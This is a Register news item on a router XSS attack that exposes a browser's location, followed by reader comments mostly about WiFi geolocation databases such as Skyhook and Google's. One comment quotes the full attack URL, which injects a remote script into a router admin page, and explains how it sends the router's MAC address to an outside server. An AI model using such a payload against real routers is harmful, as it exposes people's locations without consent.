Hacker pilfers browser GPS location via router attack If you're surfing the web from a wireless router supplied by some of the biggest device makers, there's a chance Samy Kamkar can identify your geographic location. That's because WiFi access points made by Westell and others are vulnerable to XSS, or cross-site scripting, attacks that can siphon a device's media access control …
Anyone heard of Skyhook (www.skyhookwireless.com)? Guess what they keep a database of.
No need to hack the routers as many admins have purposefully given their MAC addresses out to be used in public. Helps you find your location when GPS is suffering from an adverse dose of echoed signals rather than direct ones from the orbiting satellites.
Doesn't sound like so much of a hack now does it?
Regards
Neil
Google's "Location Service", not sure about their web services, but certainly on Android, when Android registers with a WiFi network and you have 'Share my location data' and GPS enabled, then the MAC / SSID of the WiFi point you're connected to is sent to Google along with the GPS co-ordinates.
I know this because I have an Android phone, and when using WiFi location before enabling GPS, it used the nearest cell station, now it puts the pinpoint on my house, with roughly a 100m "accuracy".
Just another reason for NoScript - ABE stops sites accessing the local network.
============================
I know this because I have an Android phone, and when using WiFi location before enabling GPS, it used the nearest cell station, now it puts the pinpoint on my house, with roughly a 100m "accuracy".
============================
Exactly the same here. There's also different companies offering location based services using wifi, eg Navizon.
The mac address isn't being extracted from the packets somewhere downstream, as you indeed correctly point out that couldn't work. What part of "http://192.168.1.1/index.cgi?active_page=9098&req_mode=0&mimic_button_field=goto%3a+9098..&button_value=9098&ssid=samy%20was%20here%3Cscript%20src=http://samy.pl/mapxss/fiospwn.js%3E%3C/script%3E" don't you understand? ;-)
It uses a cross-site request to access the router's admin page, and XSS to inject javascript into the html of that browser admin page that uses an XMLHttpRequest object to fetch the MAC address from the router and send it as a GET request parameter to a receiving script on the evil website. Relies only on HTTP between all the involved parties and no layer 2 properties at all. Should work anywhere. See http://samy.pl/mapxss/fiospwn.js for the internal details; the receiving script is http://samy.pl/mapxss/fiosmap.php and it expects the mac in "NN-NN-NN-NN-NN-NN" form as a url query string parameter named 'mac'.
Top marks to the man who said go look at Skyhook Wireless.
Skyhook's website has a reasonably detailed description of how they initially set up their database.
If you have Google Maps for Mobile on your phone, and WiFi on your phone, you are using Skyhook's services.
If the phone knows where it is (via GPS or via Skyhook) is it also potentially sniffing MAC addresses and updating not just your position on your map but also the locations in Skyhook's database of every MAC address it finds?
People might like to know. This is why I stopped using GMM.
"If it some sort of database of MAC addresses"
There's no "if", it *is* a database of MAC addresses and their geographical locations.
As you rightly point out, it is not 100% reliable, because MAC addresses aren't forever tied to the same place, and it is in principle possible for two bits of kit to have been modded to have the same MAC address.
But for a lot of MAC addresses a lot of the time it is horrifyingly accurate.
It does need something to ensure it is kept up to date, and grown to areas where it doesn't already have coverage. And what better for that than an on-the-quiet feed from every instance of Google Maps for Mobile on a WiFi-equipped phone? Nobody would expect Google to use people's data and activities for a rather different purpose than the end user was expecting, would they...
Everybody knows where Paris is, even Americans.
The Skyhook writeup I read some time ago said they seeded their database by working with a (US) courier delivery company whose vans were already carrying GPS locators. Skyhook added WiFi scanners to the fleet so wherever the vans went, they picked up the MAC addresses and know where they are. SO everywhere the courier company has been, the MAC addresses and locations are known. If I remember rightly that was a one-off exercise.
Skyhook's chosen courier company don't get everywhere, but we know someone who has near-100% coverage within selected areas.
The Google Street View cars already have cameras and GPSs. If as they drive around in their target areas they are also scanning for WiFi MAC addresses (or BSSIDs as they seem to be called sometimes), you have near-100% coverage in a given area - at least till people buy a new router, move home, whatever.
Once Street View leave the area you're presumably back to random "crowdsourced" updates from folks with smartphones etc.
[AC 14:42 here]
Sorry RalphS, missed your earlier mention of Street View here. Respect anyway.
The WLAN MAC is (obviously) visible to a WiFi receiver, but the LAN (Ethernet) MAC is typically only going to be visible on the hardwired network. The DSL side of things doesn't have a MAC address as such. So the only interesting/useful one is the WLAN one.
This post has been deleted by its author
The Register 
Biting the hand that feeds IT
Copyright. All rights reserved © 1998–2024
